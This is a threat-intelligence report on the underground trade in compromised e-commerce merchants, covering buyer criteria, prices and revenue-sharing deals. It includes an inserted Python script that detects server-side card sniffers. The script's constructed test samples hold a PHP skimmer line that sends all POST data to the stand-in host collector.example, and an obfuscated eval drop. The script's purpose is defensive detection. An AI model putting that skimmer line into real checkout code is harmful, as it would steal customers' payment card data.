
E-Commerce Merchants: A Hot Commodity in the Dark Web

In recent years, cybercriminals have implanted malicious skimming code directly into e-commerce shops and into the online content management and payment platforms they run on, as a way of stealing payment card data at scale. These attacks focused on identifying and exploiting vulnerabilities in the e-commerce platforms themselves. With prominent victims such as British Airways, Ticketmaster, and Newegg, among others, this type of attack became known as “Magecart” and gained notoriety within information security circles and beyond. As usual, that success drew increased attention from cybersecurity and e-commerce companies, which set out to identify “Magecart”-like vulnerabilities and to improve detection and mitigation of such attacks.

In response, sharper cybercriminals turned to more targeted malware attacks on e-commerce merchants, particularly small to mid-size merchants. Their goal is to compromise the merchant’s payment processing account and steal all of the payment card data the merchant processes. While the focus on small to mid-size merchants may seem counterintuitive, it is a deliberate choice: such merchants “fly below the radar” of the larger, better-resourced merchants, and of the financial institutions and card brands that tend to monitor larger merchants.

As a result, in the first half of 2019 we have observed a spike in demand for such compromised e-commerce merchant accounts on the Dark Web. Up until October 2018, there was only one prominent cybercriminal actively seeking to purchase access to compromised merchants from other hackers. In the first half of 2019 there are many more players active in this market, producing a booming trade in compromised e-commerce merchants, with cybercriminals willing to pay as much as $20,000 per merchant. The demand is likely to keep growing, further fueling growth in card-not-present (CNP) fraud.

Market Dynamics

Most of the cybercriminals on the demand side are seeking access to compromised e-commerce merchants running widespread free content management systems such as Magento, OpenCart, or osCommerce. These cybercriminals also prefer merchants that take payment directly on their e-commerce site over merchants that redirect to a payment gateway (i.e., to a secure payment page hosted by a payment service provider, or to an iframe served by one). With direct payment, the merchant’s own server handles the transaction, payment, and customer data, so a cybercriminal who controls that server can install malicious “sniffing” code that copies the data as it passes through. More advanced cybercriminals have also developed or obtained tools to extract such data from merchants that redirect payments to third parties, giving them a wider pool of merchants to pursue.
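Because the “sniffing” code described above lives in the merchant’s own checkout path, the practical check on a direct-payment store is to diff the live document root against the deployed release and inspect whatever changed for card-field access that reaches a destination other than the payment processor. The script below is an added example, not the report’s tooling or any platform’s own code: the PHP fragments, file paths and host names (api.processor.example, collector.example) are constructed for illustration, and the field names and allowlist are assumptions to adjust per platform.

```python
"""Heuristic checks for server-side card "sniffers" on a direct-payment
e-commerce host. Added example; not the report's tooling or any platform's
own code. The PHP fragments, paths and host names below are constructed."""
from __future__ import annotations

import hashlib
import re
from dataclasses import dataclass

# Checkout form field names (assumed; adjust to the platform's templates).
CARD_FIELD = re.compile(r"\b(cc_number|card_number|cardnumber|cc_cvv|cvv2?|cvc|cc_exp|expiry)\b", re.I)
# A whole-request grab ($_POST not indexed) is typical of injected code.
BULK_POST = re.compile(r"\$_POST\b(?!\s*\[)")
# Ways PHP can push data off-host.
EXFIL_SINKS = {
    "curl": re.compile(r"\bcurl_(?:init|exec)\s*\("),
    "socket": re.compile(r"\b(?:fsockopen|stream_socket_client)\s*\("),
    "http_wrapper": re.compile(r"\bfile_get_contents\s*\(\s*['\"]https?://", re.I),
    "mail": re.compile(r"\bmail\s*\("),
}
# Wrappers used to hide a payload from casual grep.
OBFUSCATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "gzinflate": re.compile(r"\b(?:gzinflate|gzuncompress|str_rot13)\s*\("),
}
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


@dataclass
class Finding:
    path: str
    severity: str  # "high" | "medium"
    reason: str


def scan_source(path: str, src: str, allowed_hosts: frozenset[str] = frozenset()) -> list[Finding]:
    """Flag code that touches card fields and can reach a host not on the
    processor allowlist, plus any obfuscation wrappers."""
    findings: list[Finding] = []
    touches_card = bool(CARD_FIELD.search(src) or BULK_POST.search(src))
    sinks = sorted(name for name, rx in EXFIL_SINKS.items() if rx.search(src))
    hosts = set(URL_HOST.findall(src))
    unknown = sorted(h for h in hosts if h.lower() not in allowed_hosts)
    # A legitimate direct-payment handler also posts card data, but only to
    # the processor; an unlisted or dynamically built destination is the signal.
    if touches_card and sinks and (unknown or not hosts):
        findings.append(Finding(path, "high",
                                f"card data reaches sink(s) {sinks}; destination(s) {unknown or 'dynamic'}"))
    obf = sorted(name for name, rx in OBFUSCATORS.items() if rx.search(src))
    if obf:
        findings.append(Finding(path, "medium", f"obfuscation wrapper(s) {obf}"))
    return findings


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def changed_paths(baseline: dict[str, str], current: dict[str, str]) -> dict[str, str]:
    """Diff two path->sha256 maps (the deployed release vs. the live docroot);
    returns path -> 'added' | 'modified' | 'removed'."""
    out: dict[str, str] = {}
    for p, h in current.items():
        if p not in baseline:
            out[p] = "added"
        elif baseline[p] != h:
            out[p] = "modified"
    for p in baseline:
        if p not in current:
            out[p] = "removed"
    return out


def audit(baseline: dict[str, str], live_src: dict[str, str],
          allowed_hosts: frozenset[str]) -> list[Finding]:
    """Scan only the files that differ from the baseline."""
    live_hashes = {p: sha256_hex(s) for p, s in live_src.items()}
    findings: list[Finding] = []
    for p, state in changed_paths(baseline, live_hashes).items():
        if state != "removed":
            findings.extend(scan_source(p, live_src[p], allowed_hosts))
    return findings


# Constructed samples: hypothetical paths, hosts and handler code.
ALLOWED_HOSTS = frozenset({"api.processor.example"})
CLEAN_HANDLER = '''<?php
$ch = curl_init("https://api.processor.example/v1/charge");
curl_setopt($ch, CURLOPT_POSTFIELDS, ["number" => $_POST["cc_number"], "cvv" => $_POST["cc_cvv"]]);
$resp = curl_exec($ch);
'''
SNIFFED_HANDLER = CLEAN_HANDLER + '''$d = base64_encode(json_encode($_POST));
@file_get_contents("https://collector.example/g.php?d=" . $d);
'''
OBFUSCATED_DROP = '''<?php
eval(base64_decode("ZWNobyAxOw=="));
'''
BASELINE = {"app/checkout/Charge.php": sha256_hex(CLEAN_HANDLER)}
LIVE_SRC = {"app/checkout/Charge.php": SNIFFED_HANDLER, "pub/media/.cache.php": OBFUSCATED_DROP}
LIVE = {p: sha256_hex(s) for p, s in LIVE_SRC.items()}

if __name__ == "__main__":
    print(changed_paths(BASELINE, LIVE))
    for f in audit(BASELINE, LIVE_SRC, ALLOWED_HOSTS):
        print(f"[{f.severity}] {f.path}: {f.reason}")
```

The allowlist is what keeps the check usable on a direct-payment store: the legitimate handler posts card data to the processor too, so “card fields plus an outbound call” alone would flag every checkout. Only a call to an unlisted host, or one whose destination is built at runtime, is scored high; obfuscation wrappers are scored medium on their own because they are unusual in platform code regardless of what they hide.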

Figure 1: A Russian-speaking cybercriminal buying access to compromised e-commerce merchants.

Typically, cybercriminals purchase access to compromised merchants from other cybercriminals, namely the hackers who managed to infect those merchants with malware. The two skill sets are quite different: the “sellers” are technical operators skilled at running malware campaigns that compromise merchants, whereas the “buyers” are fraudsters skilled at monetizing the compromised merchants, beginning with installing effective “sniffing” tools and ending with downstream fraud cash-outs. In certain cases the “buyers” do not commit the payment card fraud themselves; rather, they sell the stolen payment card data in Dark Web marketplaces. In fact, we have identified cybercriminals who recently launched such marketplaces to sell payment card data obtained from compromised e-commerce merchants.

Figure 2: Underground marketplace selling compromised payment card data

Prices for compromised merchants range from $300 to $20,000 per merchant and are closely tied to the size and type of the merchant. For example, merchants selling luxury goods with high transaction volumes are valued more highly than merchants selling moderately priced goods with low transaction volumes. In many cases the cybercriminals instead enter into a partnership: no money changes hands upfront, and they agree to share the proceeds of the fraud scheme.

Cybercriminals are eager to buy compromised merchants of almost every size. Often the only minimum requirement is that the merchant process 3-5 orders per day. The following compares several dominant cybercriminals buying access to compromised e-commerce merchants:

Buyer 1 (active since December 2016)
  Merchant criteria:
  • Minimum 5 orders / day.
  • Excluding former Soviet Union countries.
  • Only direct payments merchants.
  Business model: Paying $300 - $20,000 per merchant, or up to 85% revenue share.

Buyer 2 (active since October 2018)
  Merchant criteria:
  • Minimum 3 orders / day.
  • Direct and redirect payments.
  Business model: Paying $300 - $8,000 per merchant, or up to 80% revenue share.

Buyer 3 (active since February 2019)
  Merchant criteria:
  • Excluding former Soviet Union countries, India, Brazil and Mexico.
  • Direct and redirect payments.
  Business model: Outright purchase or revenue sharing; runs an underground marketplace selling compromised payment cards.

Buyer 4 (active since May 2019)
  Merchant criteria:
  • Minimum 10 orders / day.
  • Direct and redirect payments.
  Business model: 50/50 revenue sharing; runs an underground marketplace selling compromised payment cards.